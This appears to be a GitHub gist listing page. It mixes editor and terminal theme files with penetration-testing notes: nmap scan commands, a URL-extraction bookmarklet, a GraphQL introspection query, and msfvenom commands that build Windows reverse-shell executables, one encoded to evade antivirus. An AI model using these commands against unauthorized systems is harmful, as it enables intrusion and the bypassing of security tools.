Skip to content

Instantly share code, notes, and snippets.

View thevillagehacker's full-sized avatar
🎯
Focusing

Naveen Jagadeesan thevillagehacker

🎯
Focusing
View GitHub Profile
@thevillagehacker
thevillagehacker / dracula.omp.json
Created April 18, 2026 06:25
Dracula Theme for oh-my-posh - refined as per my liking.
{
"$schema": "https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/main/themes/schema.json",
"blocks": [
{
"alignment": "left",
"segments": [
{
"background": "#6272a4",
"foreground": "#f8f8f2",
"leading_diamond": "\ue0b6",
@thevillagehacker
thevillagehacker / monokai-color-theme.json
Last active October 16, 2024 03:35
VS Code custom Monoki color scheme
{
"type": "dark",
"colors": {
"dropdown.background": "#161b22",
"list.activeSelectionBackground": "#6e768166",
"quickInputList.focusBackground": "#6e768166",
"dropdown.listBackground": "#1e1f1c",
"list.inactiveSelectionBackground": "#6e768166",
"list.hoverBackground": "#3f415f",
"list.dropBackground": "#7d889866",
@thevillagehacker
thevillagehacker / markdown_custom_config_color_scheme.json
Last active December 17, 2024 09:09
sublime color scheme custom config for markdown
{
"variables":
{
},
"globals":
{
"foreground": "#ffffff",
"background": "#010409",
"caret": "#F8F8F0",
"invisibles": "#31333D",

To integrate this progress bar feature directly into the system's core commands (cp, mv), you can create wrapper scripts around the existing commands and place them in a directory that is prioritized in the system's PATH. Here's how you can do it:

Step 1: Create Wrapper Scripts

Create scripts that wrap around the existing cp, mv commands and add the progress bar functionality.

1. Wrapper Script for cp:

#!/bin/bash

COMMON COMMANDS

NMAP

nmap -p- -sT -sV -A $IP
nmap -p- -sC -sV $IP --open
nmap -p- --script=vuln $IP
nmap --script http-methods --script-args http-methods.url-path='/website' <target>
@thevillagehacker
thevillagehacker / extract.js
Created August 7, 2023 03:12
Extract Embeded URL and location in the web page
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
@thevillagehacker
thevillagehacker / Metasploit-cheatsheet.md
Created February 26, 2021 08:48
Metasploit cheatsheet

Metasploit Revershell CheatSheet

Msfvenom: 
msfvenom -p windows/shell_reverse_tcp LHOST=<your ip> LPORT=<your port> -f exe -o shell_reverse.exe

To avoid AV detection, use encryption

msfvenom -p windows/shell_reverse_tcp LHOST=<your ip> LPORT=<your port> -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name